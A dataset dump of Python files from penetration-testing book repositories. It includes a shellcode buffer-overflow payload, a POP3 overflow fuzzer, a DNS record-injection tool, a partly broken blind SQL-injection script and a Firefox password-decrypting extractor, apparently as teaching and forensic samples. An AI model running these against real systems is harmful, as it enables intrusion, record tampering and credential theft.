repo_name
stringclasses 29
values | text
stringlengths 18
367k
| avg_line_length
float64 5.6
132
| max_line_length
int64 11
3.7k
| alphnanum_fraction
float64 0.28
0.94
|
---|---|---|---|---|
Python-Penetration-Testing-for-Developers | import screenshot
import requests
portList = [80,443,2082,2083,2086,2087,2095,2096,8080,8880,8443,9998,4643,9001,4489]
IP = '127.0.0.1'
http = 'http://'
https = 'https://'
def testAndSave(protocol, portNumber):
url = protocol + IP + ':' + str(portNumber)
try:
r = requests.get(url,timeout=1)
if r.status_code == 200:
print 'Found site on ' + url
s = screenshot.Screenshot()
image = s.get_image(url)
image.save(str(portNumber) + '.png')
except:
pass
for port in portList:
testAndSave(http, port)
testAndSave(https, port)
| 22.259259 | 84 | 0.588517 |
Python-Penetration-Testing-for-Developers | import sys
import time
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
class Screenshot(QWebView):
def __init__(self):
self.app = QApplication(sys.argv)
QWebView.__init__(self)
self._loaded = False
self.loadFinished.connect(self._loadFinished)
def wait_load(self, delay=0):
while not self._loaded:
self.app.processEvents()
time.sleep(delay)
self._loaded = False
def _loadFinished(self, result):
self._loaded = True
def get_image(self, url):
self.load(QUrl(url))
self.wait_load()
frame = self.page().mainFrame()
self.page().setViewportSize(frame.contentsSize())
image = QImage(self.page().viewportSize(), QImage.Format_ARGB32)
painter = QPainter(image)
frame.render(painter)
painter.end()
return image
s = Screenshot()
image = s.get_image('http://www.packtpub.com')
image.save('website.png')
| 25 | 72 | 0.609082 |
Mastering-Machine-Learning-for-Penetration-Testing | import pandas
import numpy
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
# load data
url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv"
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
dataframe = pandas.read_csv(url, names=names)
array = dataframe.values
X = array[:,0:8]
Y = array[:,8]
# feature extraction
test = SelectKBest(score_func=chi2, k=4)
fit = test.fit(X, Y)
# summarize scores
numpy.set_printoptions(precision=3)
print(fit.scores_)
features = fit.transform(X)
# summarize selected features
print(features[0:5,:])
| 30.142857 | 98 | 0.738132 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/python
# -*- coding: utf-8 -*-
import hashlib
message = raw_input("Enter the string you would like to hash: ")
md5 = hashlib.md5(message)
md5 = md5.hexdigest()
sha1 = hashlib.sha1(message)
sha1 = sha1.hexdigest()
sha256 = hashlib.sha256(message)
sha256 = sha256.hexdigest()
sha512 = hashlib.sha512(message)
sha512 = sha512.hexdigest()
print "MD5 Hash =", md5
print "SHA1 Hash =", sha1
print "SHA256 Hash =", sha256
print "SHA512 Hash =", sha512
print "End of list." | 20 | 64 | 0.701245 |
Hands-On-Penetration-Testing-with-Python | """Logger module for XTreme Project"""
import time
class Logger(object):
"""Logger class for logging every important event in the discovery process"""
def __init__(self, write_to_file = False):
self.file_write = write_to_file
def log(self, string, Type, REPORT_FILE=None):
if not Type:
Type = 'INFO'
#print "[%s] - %s: %s" % (time.ctime(), Type.upper(), string)
print "[%s] - %s: %s" % (time.ctime(), Type, string.encode('utf-8'))
#write to pdf file
if REPORT_FILE and Type.find("VULNERABILITY FOUND")!=-1:
with open(REPORT_FILE, 'a') as f:
f.writelines("%s \n %s \n %s \n \n" % (time.ctime(), Type, string))
if __name__ == "__main__":
logger = Logger()
logger.log('checking!', 'warning')
logger.log('abcd')
| 29.857143 | 88 | 0.534183 |
owtf | """
owtf.managers.plugin
~~~~~~~~~~~~~~~~~~~~
This module manages the plugins and their dependencies
"""
import imp
import json
import os
from owtf.models.plugin import Plugin
from owtf.models.test_group import TestGroup
from owtf.settings import PLUGINS_DIR
from owtf.utils.error import abort_framework
from owtf.utils.file import FileOperations
TEST_GROUPS = ["web", "network", "auxiliary"]
def get_test_groups_config(file_path):
"""Reads the test groups from a config file
.. note::
This needs to be a list instead of a dictionary to preserve order in python < 2.7
:param file_path: The path to the config file
:type file_path: `str`
:return: List of test groups
:rtype: `list`
"""
test_groups = []
config_file = FileOperations.open(file_path, "r").read().splitlines()
for line in config_file:
if "#" == line[0]:
continue # Skip comments
try:
code, priority, descrip, hint, url = line.strip().split(" | ")
except ValueError:
abort_framework(
"Problem in Test Groups file: '{!s}' -> Cannot parse line: {!s}".format(
file_path, line
)
)
if len(descrip) < 2:
descrip = hint
if len(hint) < 2:
hint = ""
test_groups.append(
{
"code": code,
"priority": priority,
"descrip": descrip,
"hint": hint,
"url": url,
}
)
return test_groups
def load_test_groups(session, file_default, file_fallback, plugin_group):
"""Load test groups into the DB.
:param test_groups_file: The path to the test groups config
:type test_groups_file: `str`
:param plugin_group: Plugin group to load
:type plugin_group: `str`
:return: None
:rtype: None
"""
file_path = file_default
if not os.path.isfile(file_default):
file_path = file_fallback
test_groups = get_test_groups_config(file_path)
for group in test_groups:
session.merge(
TestGroup(
code=group["code"],
priority=group["priority"],
descrip=group["descrip"],
hint=group["hint"],
url=group["url"],
group=plugin_group,
)
)
session.commit()
def load_plugins(session):
"""Loads the plugins from the filesystem and updates their info.
.. note::
Walks through each sub-directory of `PLUGINS_DIR`.
For each file, loads it thanks to the imp module.
Updates the database with the information for each plugin:
+ 'title': the title of the plugin
+ 'name': the name of the plugin
+ 'code': the internal code of the plugin
+ 'group': the group of the plugin (ex: web)
+ 'type': the type of the plugin (ex: active, passive, ...)
+ 'descrip': the description of the plugin
+ 'file': the filename of the plugin
+ 'internet_res': does the plugin use internet resources?
:return: None
:rtype: None
"""
# TODO: When the -t, -e or -o is given to OWTF command line, only load
# the specific plugins (and not all of them like below).
# Retrieve the list of the plugins (sorted) from the directory given by
# 'PLUGIN_DIR'.
plugins = []
for root, _, files in os.walk(PLUGINS_DIR):
plugins.extend(
[
os.path.join(root, filename)
for filename in files
if filename.endswith("py")
]
)
plugins = sorted(plugins)
# Retrieve the information of the plugin.
for plugin_path in plugins:
# Only keep the relative path to the plugin
plugin = plugin_path.replace(PLUGINS_DIR, "")
# TODO: Using os.path.sep might not be portable especially on
# Windows platform since it allows '/' and '\' in the path.
# Retrieve the group, the type and the file of the plugin.
# Ensure all empty strings are removed from the list
chunks = list(filter(None, plugin.split(os.path.sep)))
# TODO: Ensure that the variables group, type and file exist when
# the length of chunks is less than 3.
if len(chunks) == 3:
group, type, file = chunks
# Retrieve the internal name and code of the plugin.
name, code = os.path.splitext(file)[0].split("@")
# Only load the plugin if in XXX_TEST_GROUPS configuration (e.g. web_testgroups.cfg)
if session.query(TestGroup).get(code) is None:
continue
# Load the plugin as a module.
filename, pathname, desc = imp.find_module(
os.path.splitext(os.path.basename(plugin_path))[0],
[os.path.dirname(plugin_path)],
)
plugin_module = imp.load_module(
os.path.splitext(file)[0], filename, pathname, desc
)
# Try te retrieve the `attr` dictionary from the module and convert
# it to json in order to save it into the database.
attr = None
try:
attr = json.dumps(plugin_module.ATTR)
except AttributeError: # The plugin didn't define an attr dict.
pass
# Save the plugin into the database.
session.merge(
Plugin(
key="{!s}@{!s}".format(type, code),
group=group,
type=type,
title=name.title().replace("_", " "),
name=name,
code=code,
file=file,
descrip=plugin_module.DESCRIPTION,
attr=attr,
)
)
session.commit()
def get_types_for_plugin_group(session, plugin_group):
"""Get available plugin types for a plugin group
:param plugin_group: Plugin group
:type plugin_group: `str`
:return: List of available plugin types
:rtype: `list`
"""
plugin_types = session.query(Plugin.type).filter_by(
group=plugin_group
).distinct().all()
plugin_types = [i[0] for i in plugin_types]
return plugin_types
def plugin_gen_query(session, criteria):
"""Generate a SQLAlchemy query based on the filter criteria
:param criteria: Filter criteria
:type criteria: `dict`
:return:
:rtype:
"""
query = session.query(Plugin).join(TestGroup)
if criteria.get("type", None):
if isinstance(criteria["type"], str):
query = query.filter(Plugin.type == criteria["type"])
if isinstance(criteria["type"], list):
query = query.filter(Plugin.type.in_(criteria["type"]))
if criteria.get("group", None):
if isinstance(criteria["group"], str):
query = query.filter(Plugin.group == criteria["group"])
if isinstance(criteria["group"], list):
query = query.filter(Plugin.group.in_(criteria["group"]))
if criteria.get("code", None):
if isinstance(criteria["code"], str):
query = query.filter(Plugin.code == criteria["code"])
if isinstance(criteria["code"], list):
query = query.filter(Plugin.code.in_(criteria["code"]))
if criteria.get("name", None):
if isinstance(criteria["name"], str):
query = query.filter(Plugin.name == criteria["name"])
if isinstance(criteria["name"], list):
query = query.filter(Plugin.name.in_(criteria["name"]))
return query.order_by(TestGroup.priority.desc())
def get_all_plugin_dicts(session, criteria=None):
"""Get plugin dicts based on filter criteria
:param criteria: Filter criteria
:type criteria: `dict`
:return: List of plugin dicts
:rtype: `list`
"""
if criteria is None:
criteria = {}
if "code" in criteria:
criteria["code"] = Plugin.name_to_code(session, criteria["code"])
query = plugin_gen_query(session, criteria)
plugin_obj_list = query.all()
plugin_dicts = []
for obj in plugin_obj_list:
plugin_dicts.append(obj.to_dict())
return plugin_dicts
def get_plugins_by_type(session, plugin_type):
"""Get plugins based on type argument
:param plugin_type: Plugin type
:type plugin_type: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"type": plugin_type})
def get_plugins_by_group(session, plugin_group):
"""Get plugins by plugin group
:param plugin_group: Plugin group
:type plugin_group: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"group": plugin_group})
def get_plugins_by_group_type(session, plugin_group, plugin_type):
"""Get plugins by group and plugin type
:param plugin_group: Plugin group
:type plugin_group: `str`
:param plugin_type: plugin type
:type plugin_type: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"type": plugin_type, "group": plugin_group})
| 32.777778 | 92 | 0.58899 |
Python-Penetration-Testing-for-Developers | import sys
import os
import nmap
with open("./nmap_output.xml", "r") as fd:
content = fd.read()
nm.analyse_nmap_xml_scan(content)
print(nm.csv()) | 19.375 | 42 | 0.635802 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
payload_length = 424
## Amount of nops
nop_length = 100
#0x7fffffffddf0
#0x7fffffffded0:
#return_address = '\xf0\xdd\xff\xff\xff\x7f\x00\x00'
return_address = '\xd0\xde\xff\xff\xff\x7f\x00\x00'
## Building the nop slide
nop_slide = "\x90" * nop_length
## Malicious code injection
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xc5\xe7\x76\x87\xc5\x35\x99"
buf += "\x1a\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\xaf\xce\x2e\x1e\xaf\x37\xc6\x70\xc4\xb9\x79\x82\x8d"
buf += "\xa2\xd1\xa3\xc7\xe7\x67\xdb\x05\x9d\x63\x89\x94\xaf"
buf += "\xff\x61\xaf\x25\xc3\x70\xef\xbf\x79\x82\xaf\x36\xc7"
buf += "\x52\x3a\x29\x1c\xa6\x9d\x3a\x9c\x6f\x33\x8d\x4d\xdf"
buf += "\x5c\x7d\x22\x35\xa7\x8e\x18\xa8\xb6\x5d\x99\x49\x8d"
buf += "\x6e\x91\xd5\x92\x7d\x10\xfc\xca\xe2\x76\x87\xc5\x35"
buf += "\x99\x1a"
## Building the padding between buffer overflow start and return address
padding = 'B' * (payload_length - nop_length - len(buf))
#perfect
print nop_slide + buf + padding + return_address
| 36.206897 | 72 | 0.690167 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
string="A"*2606 + "B"*4 +"C"*90
if 1:
print"Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.136',110))
data=s.recv(1024)
#print str(data)
s.send('USER root\r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + string + '\r\n')
data=s.recv(1024)
print str(data)
print "done"
#s.send('QUIT\r\n')
#s.close()
| 18.259259 | 54 | 0.576108 |
PenTestScripts | #!/usr/bin/env python
# by Chris Truncer
# Script to attempt to forge a packet that will inject a new value
# for a dns record. Check nessus plugin #35372
# Some great documentation and sample code came from:
# http://bb.secdev.org/scapy/src/46e0b3e619547631d704c133a0247cf4683c0784/scapy/layers/dns.py
import argparse
import logging
# I know it's bad practice to add code up here, but it's the only way I could
# see to suppress the IPv6 warning from scapy (By setting this
# before importing scapy).
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import os
from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, sr1
import sys
def add_a_record(name_server, new_dns_record, ip_value):
os.system('clear')
title()
# Verifying all required options have a populated value
if name_server is None or new_dns_record is None or ip_value is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record injection..."
print "[*] Sending DNS packet adding " + new_dns_record
print "[*] and pointing it to " + ip_value + "\n"
dns_zone = new_dns_record[new_dns_record.find(".")+1:]
# Craft the packet with scapy
add_packet = sr1(IP(dst=name_server)/UDP()/DNS(
opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[DNSRR(rrname=new_dns_record,
type="A", ttl=120, rdata=ip_value)]))
print add_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def cli_parser():
# Command line argument parser
parser = argparse.ArgumentParser(
add_help=False,
description="DNSInject is a tool for modifying DNS records on vulnerable servers.")
parser.add_argument(
"--add", action='store_true',
help="Add \"A\" record to the vulnerable name server.")
parser.add_argument(
"--delete", action='store_true',
help="Delete \"A\" record from the vulnerable name server.")
parser.add_argument(
"-ns", metavar="ns1.test.com",
help="Nameserver to execute the specified action.")
parser.add_argument(
"-d", metavar="mynewarecord.test.com",
help="Domain name to create an A record for.")
parser.add_argument(
"-ip", metavar="192.168.1.1",
help="IP Address the new record will point to.")
parser.add_argument(
'-h', '-?', '--h', '-help', '--help', action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.h:
parser.print_help()
sys.exit()
return args.add, args.delete, args.ns, args.d, args.ip
def delete_dns_record(del_ns, del_record):
os.system('clear')
title()
# Verifying all required options have a populated value
if del_ns is None or del_record is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record deletion..."
print "[*] Sending packet which deletes the following record: "
print "[*] " + del_record + "\n"
dns_zone = del_record[del_record.find(".")+1:]
del_packet = sr1(IP(dst=del_ns)/UDP()/DNS(
opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[DNSRR(rrname=del_record, type="ALL",
rclass="ANY", ttl=0, rdata="")]))
print del_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def title():
print "######################################################################"
print "# DNS Injector #"
print "######################################################################\n"
return
if __name__ == '__main__':
# Parse command line arguments
action_add, action_delete, dns_nameserver, dns_record, dns_ip = cli_parser()
#Chose function based on action variable value
try:
if action_add:
add_a_record(dns_nameserver, dns_record, dns_ip)
elif action_delete:
delete_dns_record(dns_nameserver, dns_record)
else:
print "[*] ERROR: You didn't provide a valid action."
print "[*] ERROR: Restart and provide your desired action!"
sys.exit()
except AttributeError:
os.system('clear')
title()
print "[*] ERROR: You didn't provide a valid action."
print "[*] ERROR: Restart and provide your desired action!"
| 31.737589 | 93 | 0.599783 |
cybersecurity-penetration-testing | import requests
import sys
url = sys.argv[1]
yes = sys.argv[2]
answer = []
i = 1
asciivalue = 1
letterss = []
print "Kicking off the attempt"
payload = {'injection': '\'AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}
while True:
req = requests.post(url, data=payload)
lengthtest = req.text
if yes in lengthtest:
length = i
break
i = i+1
for x in range(1, length):
payload = {'injection': '\'AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}
req = requests.post(url, data=payload, cookies=cookies)
if yes in req.text:
answer.append(asciivalue)
else:
asciivalue = asciivalue + 1
pass
asciivalue = 1
print "Recovered String: "+ ''.join(answer) | 20.69697 | 112 | 0.653147 |
cybersecurity-penetration-testing | import time, dpkt
import plotly.plotly as py
from plotly.graph_objs import *
from datetime import datetime
filename = 'hbot.pcap'
full_datetime_list = []
dates = []
for ts, pkt in dpkt.pcap.Reader(open(filename,'rb')):
eth=dpkt.ethernet.Ethernet(pkt)
if eth.type!=dpkt.ethernet.ETH_TYPE_IP:
continue
ip = eth.data
tcp=ip.data
if ip.p not in (dpkt.ip.IP_PROTO_TCP, dpkt.ip.IP_PROTO_UDP):
continue
if tcp.dport == 21 or tcp.sport == 21:
full_datetime_list.append((ts, str(time.ctime(ts))))
for t,d in full_datetime_list:
if d not in dates:
dates.append(d)
dates.sort(key=lambda date: datetime.strptime(date, "%a %b %d %H:%M:%S %Y"))
datecount = []
for d in dates:
counter = 0
for d1 in full_datetime_list:
if d1[1] == d:
counter += 1
datecount.append(counter)
data = Data([
Scatter(
x=dates,
y=datecount
)
])
plot_url = py.plot(data, filename='FTP Requests')
| 18.96 | 76 | 0.608826 |
cybersecurity-penetration-testing |
import datetime
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20150815'
__version__ = '0.01'
__description__ = "Convert unix formatted timestamps (seconds since Epoch [1970-01-01 00:00:00]) to human readable"
def main():
unix_ts = int(raw_input('Unix timestamp to convert:\n>> '))
print unix_converter(unix_ts)
def unix_converter(timestamp):
date_ts = datetime.datetime.utcfromtimestamp(timestamp)
return date_ts.strftime('%m/%d/%Y %I:%M:%S %p UTC')
if __name__ == '__main__':
main()
| 26.421053 | 115 | 0.653846 |
cybersecurity-penetration-testing | # Simple Substitution Keyword Cipher
# http://inventwithpython.com/hacking (BSD Licensed)
import pyperclip, simpleSubCipher
def main():
myMessage = r"""Your cover is blown."""
myKey = 'alphanumeric'
myMode = 'encrypt' # set to 'encrypt' or 'decrypt'
print('The key used is:')
print(makeSimpleSubKey(myKey))
if myMode == 'encrypt':
translated = encryptMessage(myKey, myMessage)
elif myMode == 'decrypt':
translated = decryptMessage(myKey, myMessage)
print('The %sed message is:' % (myMode))
print(translated)
pyperclip.copy(translated)
print()
print('This message has been copied to the clipboard.')
def encryptMessage(key, message):
key = makeSimpleSubKey(key)
return simpleSubCipher.encryptMessage(key, message)
def decryptMessage(key, message):
key = makeSimpleSubKey(key)
return simpleSubCipher.decryptMessage(key, message)
def makeSimpleSubKey(keyword):
# create the key from the keyword
newKey = ''
keyword = keyword.upper()
keyAlphabet = list(simpleSubCipher.LETTERS)
for i in range(len(keyword)):
if keyword[i] not in newKey:
newKey += keyword[i]
keyAlphabet.remove(keyword[i])
key = newKey + ''.join(keyAlphabet)
return key
if __name__ == '__main__':
main() | 25.461538 | 60 | 0.639273 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sqlite3, sys, glob, shutil, json, time, hashlib
from base64 import b64decode
from os import path, walk,makedirs,remove
from ctypes import (Structure, c_uint, c_void_p, c_ubyte,c_char_p, CDLL, cast,byref,string_at)
from datetime import datetime
from subprocess import call
# Magic Module: https://github.com/ahupp/python-magic
###############################################################################################################
magicpath = 'C:\WINDOWS\system32\magic' # Only in Windows, path to magic file (Read Manual in www.dumpzilla.org)
watchsecond = 4 # --Watch option: Seconds update. (NO Windows)
python3_path = "" # Python 3.x path (NO Windows). Example: /usr/bin/python3.2
##############################################################################################################
def show_info_header():
if sys.version.startswith('2.') == True and varSession2OK == 1 and varPasswordsOK == 1:
print ("\n[WARNING]: Python 2.x currently used, Python 3.x and UTF-8 is recommended !")
elif varSession2OK == 1:
print ("\nExecution time: %s" % datetime.now())
print ("Mozilla Profile: %s\n" % varDir)
##############################################################################################################
def show_sha256(filepath):
sha256 = hashlib.sha256()
f = open(filepath, 'rb')
try:
sha256.update(f.read())
finally:
f.close()
return "[SHA256 hash: "+sha256.hexdigest()+"]"
#############################################################################################################
class SECItem(Structure):
_fields_ = [('type',c_uint),('data',c_void_p),('len',c_uint)]
class secuPWData(Structure):
_fields_ = [('source',c_ubyte),('data',c_char_p)]
(SECWouldBlock,SECFailure,SECSuccess)=(-2,-1,0)
(PW_NONE,PW_FROMFILE,PW_PLAINTEXT,PW_EXTERNAL)=(0,1,2,3)
def readsignonDB(varDir):
show_title("Decode Passwords", 250)
count = 0
if libnss.NSS_Init(varDir)!=0:
print ("Error Initializing NSS_Init, Probably no useful results")
conn = sqlite3.connect(varDir+"/signons.sqlite")
conn.text_factory = str
c = conn.cursor()
c.execute("select hostname, encryptedUsername, encryptedPassword from moz_logins")
for row in c:
uname.data = cast(c_char_p(b64decode(row[1])),c_void_p)
uname.len = len(b64decode(row[1]))
passwd.data = cast(c_char_p(b64decode(row[2])),c_void_p)
passwd.len=len(b64decode(row[2]))
if libnss.PK11SDR_Decrypt(byref(uname),byref(dectext),byref(pwdata))==-1:
print ("Error: Master Password used !")
return
print ("Web: %s:"%row[0].encode("utf-8"))
print ("Username: %s" % string_at(dectext.data,dectext.len))
if libnss.PK11SDR_Decrypt(byref(passwd),byref(dectext),byref(pwdata))==-1:
print ("Error: Master Password used !")
return
print ("Passsword: %s" % string_at(dectext.data,dectext.len))
print ("\n")
count = count + 1
contador['Passwords_decode'] = count
c.close()
conn.close()
libnss.NSS_Shutdown()
##############################################################################################################
def show_session(varDir):
if sys.platform.startswith('win') == True:
if path.isfile(varDir+"\\sessionstore.js") == False and path.isfile(varDir+"\\sessionstore.json") == False:
return
else:
if path.isfile(varDir+"\\sessionstore.js") == True:
f = open(varDir+"\\sessionstore.js")
hashsession = show_sha256(varDir+"\\sessionstore.js")
elif path.isfile(varDir+"\\sessionstore.json") == True:
f = open(varDir+"\\sessionstore.json")
hashsession = show_sha256(varDir+"\\sessionstore.json")
else:
if path.isfile(varDir+"/sessionstore.js") == False and path.isfile(varDir+"/sessionstore.json") == False:
return
else:
if path.isfile(varDir+"/sessionstore.js") == True:
f = open(varDir+"/sessionstore.js")
hashsession = show_sha256(varDir+"/sessionstore.js")
elif path.isfile(varDir+"/sessionstore.json") == True:
f = open(varDir+"/sessionstore.json")
hashsession = show_sha256(varDir+"/sessionstore.json")
filesession = "js"
jdata = json.loads(f.read())
f.close()
extract_data_session(jdata,filesession,hashsession)
if sys.platform.startswith('win') == True:
if path.isfile(varDir+"\\sessionstore.bak") == False and path.isfile(varDir+"\\sessionstore.bak") == False:
return
else:
if path.isfile(varDir+"\\sessionstore.bak") == True:
f = open(varDir+"\\sessionstore.bak")
hashsession = show_sha256(varDir+"\\sessionstore.bak")
else:
if path.isfile(varDir+"/sessionstore.bak") == False and path.isfile(varDir+"/sessionstore.bak") == False:
return
else:
if path.isfile(varDir+"/sessionstore.bak") == True:
f = open(varDir+"/sessionstore.bak")
hashsession = show_sha256(varDir+"/sessionstore.bak")
filesession = "bak"
jdata = json.loads(f.read())
f.close()
extract_data_session(jdata,filesession,hashsession)
###################################################################################################################
def extract_data_session(jdata,filesession,hashsession):
if filesession == "js":
show_title("Session "+hashsession, 302)
elif filesession == "bak":
show_title("Backup session "+hashsession, 302)
count = 0
print ("Last update %s:\n " % time.ctime(jdata["session"]["lastUpdate"]/1000.0))
for win in jdata.get("windows"):
for tab in win.get("tabs"):
if tab.get("index") is not None:
i = tab.get("index") - 1
print ("Title: %s" % tab.get("entries")[i].get("title"))
print ("URL: %s" % tab.get("entries")[i].get("url"))
if tab.get("entries")[i].get("referrer") is not None:
print ("Referrer: %s" % tab.get("entries")[i].get("referrer"))
if tab.get("entries")[i].get("formdata") is not None and str(tab.get("entries")[i].get("formdata")) != "{}" :
if str(tab.get("entries")[i].get("formdata").get("xpath")) == "{}" and str(tab.get("entries")[i].get("formdata").get("id")) != "{}":
print ("Form: %s\n" % tab.get("entries")[i].get("formdata").get("id"))
elif str(tab.get("entries")[i].get("formdata").get("xpath")) != "{}" and str(tab.get("entries")[i].get("formdata").get("id")) == "{}":
print ("Form: %s\n" % tab.get("entries")[i].get("formdata").get("xpath"))
else:
print ("Form: %s\n" % tab.get("entries")[i].get("formdata"))
print ("\n")
count = count + 1
if filesession == "js":
contador['Session1'] = count
elif filesession == "bak":
contador['Session2'] = count
##############################################################################################################
def extract_data_session_watch (varDir):
if path.isfile(varDir+"/sessionstore.js") == False and path.isfile(varDir+"/sessionstore.json") == False:
return
else:
if path.isfile(varDir+"/sessionstore.js") == True:
f = open(varDir+"/sessionstore.js")
elif path.isfile(varDir+"/sessionstore.json") == True:
f = open(varDir+"/sessionstore.json")
filesession = "js"
jdata = json.loads(f.read())
f.close()
count = 0
countform = 0
for win in jdata.get("windows"):
for tab in win.get("tabs"):
if tab.get("index") is not None:
i = tab.get("index") - 1
print ("Title: %s" % tab.get("entries")[i].get("title"))
print ("URL: %s" % tab.get("entries")[i].get("url"))
if tab.get("entries")[i].get("formdata") is not None and str(tab.get("entries")[i].get("formdata")) != "{}" :
countform = countform + 1
if str(tab.get("entries")[i].get("formdata").get("xpath")) == "{}" and str(tab.get("entries")[i].get("formdata").get("id")) != "{}":
print ("Form: %s\n" % tab.get("entries")[i].get("formdata").get("id"))
elif str(tab.get("entries")[i].get("formdata").get("xpath")) != "{}" and str(tab.get("entries")[i].get("formdata").get("id")) == "{}":
print ("Form: %s\n" % tab.get("entries")[i].get("formdata").get("xpath"))
else:
print ("Form: %s\n" % tab.get("entries")[i].get("formdata"))
print ("\n")
count = count + 1
print ("\n\n\n* Last update: %s " % time.ctime(jdata["session"]["lastUpdate"]/1000.0))
print ("* Number of windows / tabs in use: %s" % count)
print ("* Number of webs with forms in use: %s" % countform)
print ("* Exit: Cntrl + c")
##############################################################################################################
def All_execute(varDir):
show_cookies_firefox(varDir,varDom = 0)
show_permissions_firefox(varDir)
show_preferences_firefox(varDir)
show_addons_firefox(varDir)
show_extensions_firefox(varDir)
show_search_engines(varDir)
show_info_addons(varDir)
show_downloads_firefox(varDir)
show_downloads_history_firefox(varDir)
show_downloadsdir_firefox(varDir)
show_forms_firefox(varDir)
show_history_firefox(varDir)
show_bookmarks_firefox(varDir)
show_passwords_firefox(varDir)
show_cache_offline(varDir)
show_cert_override(varDir)
show_thumbnails(varDir)
show_session(varDir)
###############################################################################################################
def show_cookies_firefox(varDir, varDom = 1, varDomain = "%",varName = "%",varHost = "%", varLastacess = "%", varCreate = "%", varSecure = "%", varHttp = "%", varRangeLast1 = "1991-08-06 00:00:00", varRangeLast2 = "3000-01-01 00:00:00",varRangeCreate1 = "1991-08-06 00:00:00", varRangeCreate2 = "3000-01-01 00:00:00"):
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\cookies.sqlite"
else:
bbdd = varDir+"/cookies.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: Cookies database not found !")
return
show_title("Cookies "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
conn.text_factory = str
cursor = conn.cursor()
cursor.execute("select baseDomain, name, value, host, path, datetime(expiry, 'unixepoch', 'localtime'), datetime(lastAccessed/1000000,'unixepoch','localtime') as last ,datetime(creationTime/1000000,'unixepoch','localtime') as creat, isSecure, isHttpOnly FROM moz_cookies where baseDomain like ? escape '\\' and name like ? escape '\\' and host like ? escape '\\' and last like ? and creat like ? and isSecure like ? and isHttpOnly like ? and last between ? and ? and creat between ? and ?",[varDomain,varName,varHost,('%'+varLastacess+'%'),('%'+varCreate+'%'),varSecure,varHttp, varRangeLast1, varRangeLast2, varRangeCreate1,varRangeCreate2])
for row in cursor:
print('Domain: %s' % row[0])
print('Host: %s' % row[3])
print('Name: %s' % row[1])
print('Value: %s' % row[2])
print('Path: %s' % row[4])
print('Expiry: %s' % row[5])
print('Last acess: %s' % row[6])
print('Creation Time: %s' % row[7])
if row[8] == 0:
print('Secure: No')
else:
print('Secure: Yes')
if row[9] == 0:
print('HttpOnly: No')
else:
print('HttpOnly: Yes')
print("\n")
count = count +1
contador['Cookies'] = count
contador['DOMshow'] = "WARNING: For show the DOM storage data , use the option -showdom"
if varDom == 0:
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\webappsstore.sqlite"
else:
bbdd = varDir+"/webappsstore.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: Webappsstore database not found !")
return
show_title("DOM Storage "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
conn.text_factory = str
cursor = conn.cursor()
cursor.execute("select scope,value from webappsstore2")
for row in cursor:
if row[0].find("http") == -1:
print('Domain: %s' % path.split(row[0][::-1])[1][1:])
if row[0].startswith("/") == False and row[0].find("http") != -1:
print('Domain: %s' % path.split(row[0][::-1])[1].rsplit(':.', 1)[1])
print('DOM data: %s' % row[1])
print ("\n------------------------\n")
count = count +1
contador['DOM'] = count
cursor.close()
conn.close()
###############################################################################################################
def show_permissions_firefox(varDir,varHostPreferences = "%"):
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\permissions.sqlite"
else:
bbdd = varDir+"/permissions.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: Permissions database not found !")
return
show_title("Permissions "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
conn.text_factory = str
cursor = conn.cursor()
cursor.execute("select host,type,permission,expireType,datetime(expireTime/1000,'unixepoch','localtime') from moz_hosts where host like ? escape '\\'",[varHostPreferences])
for row in cursor:
print('Host: %s' % row[0])
print('Type: %s' % row[1])
print('Permission: %s' % row[2])
if row[3] == 0:
print('Not expire')
else:
print('Expire Time: %s' % row[4])
print("\n")
count = count +1
contador['Preferences'] = count
cursor.close()
conn.close()
def show_preferences_firefox(varDir):
if sys.platform.startswith('win') == True:
dirprefs = "\\prefs.js"
else:
dirprefs = "/prefs.js"
if path.isfile(varDir+dirprefs) == False:
print ("[ERROR]: prefs.js not found !")
return
